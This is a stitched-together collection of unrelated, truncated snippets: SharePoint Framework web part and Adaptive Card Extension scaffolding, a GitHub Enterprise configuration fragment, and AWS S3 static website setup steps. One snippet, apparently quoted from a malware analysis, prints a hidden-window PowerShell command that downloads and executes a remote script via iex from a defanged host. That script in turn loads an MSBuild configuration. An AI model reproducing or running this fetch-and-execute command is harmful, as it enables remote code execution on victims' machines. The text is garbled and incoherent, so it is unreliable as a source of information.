HelloWorldWebPart.ts in the src\webparts\helloworld folder defines the main entry point for the web part. The web part class HelloWorldWebPart extends the BaseClientSideWebPart. Any client-side web part should extend the BaseClientSideWebPart class to be defined as a valid web part....
//api.github.mycompany.com'], ['name': 'Acme','url': 'https://api.github.acme.com'] ] organisations=[ [ name:"mycompany", displayName:"MyCompany", description:"MyCompany Github Enterprise Organisation", project:[ apiEndpoint:"MyCompany", owner:"mycompany", credentialsId:"mycompany",...
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoExit -w hidden -Command iex(New-Object System.Net.WebClient).DownloadString('hxxp://apb[.]sh/helloworld[.]ps1') Helloworld.ps1 downloads the MSBuild configuration from another URL, hxxp://apb[.]sh/msbuild[.]xml and launches it...
ACL for object87. S3 WebsitesCreate HTML files index.html error.html upload them to the bucket Enabling static website hosting Bucket Properties Static website hosting -> Edit Index document: index.html Error document: error.html Go to Bucket website endpoint http://the-bucket-of-art-20...
ACEs can be configured just like Web Parts. The API signatures are identical for the following methods, found in the HelloWorldAdaptiveCardExtension.ts file:getPropertyPaneConfiguration() onPropertyPaneFieldChanged()The default scaffolding for ACEs uses a new API that aims to minimize the bun...